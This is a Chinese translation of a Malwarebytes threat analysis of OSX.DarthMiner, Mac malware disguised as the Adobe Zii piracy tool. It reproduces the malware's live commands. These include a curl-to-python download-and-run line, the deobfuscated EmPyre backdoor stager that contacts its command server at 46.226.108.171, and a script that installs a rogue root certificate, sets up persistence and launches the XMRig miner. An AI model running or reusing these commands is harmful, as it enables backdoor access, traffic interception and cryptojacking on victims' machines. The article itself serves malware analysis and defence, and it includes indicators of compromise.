-
-
[翻译]结合Empyre后门和XMRig挖矿软件的Mac恶意软件
-
2019-3-18 19:19 5761
-
本周早些时候(2018.12.7),我们发现了一种新的Mac恶意软件,这种软件出于恶意目的,结合了两种不同的开源工具――EmPyre后门和XMRig加密挖矿软件。
该恶意软件通过Adobe zii这一应用软件进行传播。Adobe zii是对Adobe软件进行盗版的软件。但在这种情况下,这个名为Adobe Zii的软件并不是真实的。
从以上截图中可以发现,实际的Adobe Zii软件(左侧),使用了Adobe Creative Cloud徽标(毕竟,如果要编写软件来帮助人们窃取Adobe软件,为什么不同时偷取徽标?)。然而,恶意软件安装程序使用通用的Automator applet图标。
行为表现
使用Automator打开假的Adobe Zii 软件,可以看到它仅仅运行了一个shell脚本。
curl https://ptpb.pw/jj9a | python - & s=46.226.108.171:80; curl $s/sample.zip -o sample.zip; unzip sample.zip -d sample; cd sample; cd __MACOSX; open -a sample.app
这个脚本下载并运行了一个python脚本,然后下载并运行一个名为sample.app的应用。
simple.app 很简单,它只是某个版本的Adobe Zii,可能只是为了让这个恶意软件看起来更像是“合法的”。(这并不是指软件盗版是合法的,当然,这只是让这个恶意软件看起来正在做用户想让他做的事情)
这个python脚本是什么呢?它被混淆过,但是可以很容易就被解混淆,脚本如下:
import sys;import re, subprocess;cmd = "ps -ef | grep Little\ Snitch | grep -v grep" ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE) out = ps.stdout.read() ps.stdout.close() if re.search("Little Snitch", out): sys.exit() import urllib2; UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='http://46.226.108.171:4444';t='/news.php';req=urllib2.Request(server+t); req.add_header('User-Agent',UA); req.add_header('Cookie',"session=SYDFioywtcFbUR5U3EST96SbqVk="); proxy = urllib2.ProxyHandler(); o = urllib2.build_opener(proxy); urllib2.install_opener(o); a=urllib2.urlopen(req).read(); IV=a[0:4];data=a[4:];key=IV+'3f239f68a035d40e1891d8b5fdf032d3';S,j,out=range(256),0,[] for i in range(256): j=(j+S[i]+ord(key[i%len(key)]))%256 S[i],S[j]=S[j],S[i] i=j=0 for char in data: i=(i+1)%256 j=(j+S[i])%256 S[i],S[j]=S[j],S[i] out.append(chr(ord(char)^S[(S[i]+S[j])%256])) exec(''.join(out))
这个脚本首先做的是寻找常用的外出防火墙Little Snitch是否存在,这种防火墙会将后门的网络连接报告给用户。如果Little Snitch存在,则恶意软件会失败。(当然,如果安装了像Little Snitch这样的防火墙,它就会阻止尝试下载此脚本的连接,因此在这一点上进行检查毫无价值。)
这个脚本打开EmPyre后门的连接,该后门能够将任意命令发送到受感染的Mac。后门打开后,它会收到一个命令,将以下脚本下载到/private/tmp/uploadminer.sh并执行:
# osascript -e "do shell script \"networksetup -setsecurewebproxy "Wi-Fi" 46.226.108.171 8080 && networksetup -setwebproxy "Wi-Fi" 46.226.108.171 8080 && curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem && security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain verysecurecert.pem\" with administrator privileges" cd ~/Library/LaunchAgents curl -o com.apple.rig.plist http://46.226.108.171/com.apple.rig.plist curl -o com.proxy.initialize.plist http://46.226.108.171/com.proxy.initialize.plist launchctl load -w com.apple.rig.plist launchctl load -w com.proxy.initialize.plist cd /Users/Shared curl -o config.json http://46.226.108.171/config.json curl -o xmrig http://46.226.108.171/xmrig chmod +x ./xmrig rm -rf ./xmrig2 rm -rf ./config2.json ./xmrig -c config.json &
这种脚本下载并安装恶意软件的另一个组件。创建了一个名为com.proxy.initialize.plist的启动代理,通过运行前面提到的混淆Python脚本来持久地打开后门。
该脚本还将XMRig cryptominer和配置文件下载到/Users/Shared/文件夹中,并设置名为com.apple.rig.plist的启动代理,以使XMRig进程在该配置处于活动状态时运行。(“com.apple”名称直接就是一个红色标志,是发现此恶意软件的根本原因。)
有趣的是,该脚本中有代码用于下载和安装与mitmproxy软件相关的根证书,该软件能够拦截所有网络流量,包括(借助证书)加密的“https”流量。但是,该代码已被注释掉,表明它没有激活。
从表面上看,这种恶意软件似乎是相当无攻击性的。由于占用了所有CPU/GPU,Cryptominers通常只会导致计算机速度变慢。
但是,这不仅仅是一个挖矿软件。该挖矿软件是通过后门发出的命令安装的,并且过去很可能已经发送给受感染的Mac其他命令。所以无法确切知道此恶意软件可能对受感染系统造成的损害。我们目前只观察到采矿行为并不意味着它从未做过其他事情。
启示
Malwarebytes for Mac将此恶意软件检测为OSX.DarthMiner。如果你被感染了,除了加密挖矿之外,不可能知道恶意软件还可能做了什么,完全有可能你的文件或者密码已经遭到泄露。
从中可以学到一个重要的教训:众所周知,软件盗版是在Mac上进行的最危险的活动之一。被感染的危险很高,但人们仍然会这样做。请在将来不要使用盗版软件,因为代价可能远高于正版软件的价格。
IOCs
Adobe Zii.app.zip SHA256: ebecdeac53069c9db1207b2e0d1110a73bc289e31b0d3261d903163ca4b1e31e
文章链接:https://blog.malwarebytes.com/threat-analysis/2018/12/mac-malware-combines-empyre-backdoor-and-xmrig-miner/
翻译:看雪翻译小组 欢歌笑语
校对:看雪翻译小组 fyb波
[培训]二进制漏洞攻防(第3期);满10人开班;模糊测试与工具使用二次开发;网络协议漏洞挖掘;Linux内核漏洞挖掘与利用;AOSP漏洞挖掘与利用;代码审计。